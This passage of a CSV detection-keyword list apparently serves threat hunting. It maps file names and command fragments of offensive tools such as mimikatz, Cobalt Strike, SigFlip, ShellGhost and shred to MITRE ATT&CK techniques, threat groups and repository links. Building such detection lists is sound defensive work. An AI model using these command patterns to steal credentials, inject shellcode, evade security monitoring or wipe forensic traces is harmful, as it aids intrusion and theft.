Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*shellter.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*shepardsbind_recv.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*shepbind_serv.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Sherlock.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*sherlock.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Shhmon.csproj*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Shhmon.exe*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*Shhmon.git*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shocknawe.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*Shodan.io*","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*ShorSec/DllNotificationInjection*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*ShorSec/ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shspawn x64 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shspawn x86 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*shucknt.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*ShuckNT-main*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*ShutdownRepo/pywhisker*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*ShutdownRepo/smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys 